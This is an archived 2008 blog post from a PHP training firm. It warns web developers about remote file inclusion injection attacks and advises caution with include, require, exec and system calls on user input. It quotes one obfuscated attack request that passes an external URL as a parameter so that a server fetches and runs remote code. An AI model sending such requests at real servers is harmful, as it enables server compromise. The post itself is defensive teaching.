Home Accessibility Courses Twitter The Mouth Facebook Resources Site Map About Us Contact
 
For 2021 - online Python 3 training - see ((here)).

Our plans were to retire in summer 2020 and see the world, but Coronavirus has lead us into a lot of lockdown programming in Python 3 and PHP 7.
We can now offer tailored online training - small groups, real tutors - works really well for groups of 4 to 14 delegates. Anywhere in the world; course language English.

Please ask about private 'maintenance' training for Python 2, Tcl, Perl, PHP, Lua, etc.
Injection Attacks - avoiding them in your PHP

"Please help me debug this virus." I'm paraphrasing something that was posted, a long while ago now, on a board I look after ... and I deleted the code pretty darned fast, as I didn't (and still don't) want to form a source of information for the less scrupulous.

I was looking at a few issues on one of our servers earlier today, and found myself looking through page after page of attempted injection attacks, where a rogue visitor to the web site (almost inevitable an automated program) supplies a parameter that's the URL from another site, in the hope that my PHP script will read that other page and run the code therein on my server ... here's an example of the sort of thing (and this one's quite well known, and I have obfuscated it anyway, so I am giving few secrets away)

/phphtml.php?htmlclass_path=http://titureddo.changeview.org/vacanze/vini.txt?

Now ... this issue turned out to be a side shoot of what I was hunting down, but it acts as a timely reminder to be very careful indeed about using PHP's require, include, passthru, exec, system (and that may not be an exhaustive list either) on anything that could remotely be a variable derived from a user input via $_REQUEST and friends.

What's the risk? It's an injection attack (yes, I have the code. No - I am not reproducing it here!) and if it succeeds in finding a hole in your system, chances are (and experiences I have heard of confirm) that it will install itself on your server which will then form a part of the breeding colony ...

How many hack attempts like this are we getting? I estimate it's now thousands per day.

How do I know if I'm infected Well ... if you search your web pages for kangkung or RoxTeam and find something that you didn't know was there ...

Please note that this is just an example of one form of injection attack - this article is not intended to provide a complete of definitive list in any shape or form!
(written 2008-08-31, updated 2008-09-04)

 
Associated topics are indexed as below, or enter http://melksh.am/nnnn for individual articles
H117 - Security in PHP
  [345] Spotting a denial of service attack - (2005-06-12)
  [426] Robust checking of data entered by users - (2005-08-27)
  [920] A lion in a cage - PHP - (2006-11-10)
  [947] What is an SQL injection attack? - (2006-11-27)
  [1052] Learning to write secure, maintainable PHP - (2007-01-25)
  [1086] Injection attacks - safeguard your PHP scripts - (2007-02-20)
  [1323] Easy handling of errors in PHP - (2007-08-27)
  [1387] Error logging to file not browser in PHP - (2007-10-11)
  [1396] Using PHP to upload images / Store on MySQL database - security questions - (2007-10-19)
  [1482] A story about benchmarking PHP - (2007-12-23)
  [1542] Are nasty programs looking for security holes on your server? - (2008-02-17)
  [1679] PHP - Sanitised application principles for security and useability - (2008-06-16)
  [1694] Defensive coding techniques in PHP? - (2008-07-02)
  [1747] Who is watching you? - (2008-08-10)
  [2025] Injection Attack if register_globals in on - PHP - (2009-02-04)
  [2628] An example of an injection attack using Javascript - (2010-02-08)
  [2688] Security considerations in programming - what do we teach? - (2010-03-22)
  [2939] Protecting your images from use out of context - (2010-08-29)
  [3210] Catchable fatal error in PHP ... How to catch, and alternative solutions such as JSON - (2011-03-22)
  [3698] How to stop forms on other sites submitting to your scripts - (2012-04-15)
  [3747] An easy way to comply with the new cookie law if your site is well designed - (2012-06-02)
  [3813] Injection Attacks - PHP, SQL, HTML, Javascript - and how to neutralise them - (2012-07-22)
  [4642] A small teaching program - demonstration of principles only - (2016-02-08)


Back to
Pointing all the web pages in a directory at a database
Previous and next
or
Horse's mouth home
Forward to
Server overloading - turns out to be feof in PHP
Some other Articles
Think before you send
Calling procs in Tcl and how it compares to Perl
Reception
Server overloading - turns out to be feof in PHP
Injection Attacks - avoiding them in your PHP
Pointing all the web pages in a directory at a database
The Rise and Rise of First Bus Fares
Does fruit and veg drag on?
Easterholic
What is my real and my effective ID? [Linux]
4759 posts, page by page
Link to page ... 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96 at 50 posts per page


This is a page archived from The Horse's Mouth at http://www.wellho.net/horse/ - the diary and writings of Graham Ellis. Every attempt was made to provide current information at the time the page was written, but things do move forward in our business - new software releases, price changes, new techniques. Please check back via our main site for current courses, prices, versions, etc - any mention of a price in "The Horse's Mouth" cannot be taken as an offer to supply at that price.

Link to Ezine home page (for reading).
Link to Blogging home page (to add comments).

You can Add a comment or ranking to this page

© WELL HOUSE CONSULTANTS LTD., 2021: 48 Spa Road • Melksham, Wiltshire • United Kingdom • SN12 7NY
PH: 01144 1225 708225 • EMAIL: info@wellho.net • WEB: http://www.wellho.net • SKYPE: wellho

PAGE: http://www.wellho.net/mouth/1779_Inj ... r-PHP.html • PAGE BUILT: Sun Oct 11 16:07:41 2020 • BUILD SYSTEM: JelliaJamb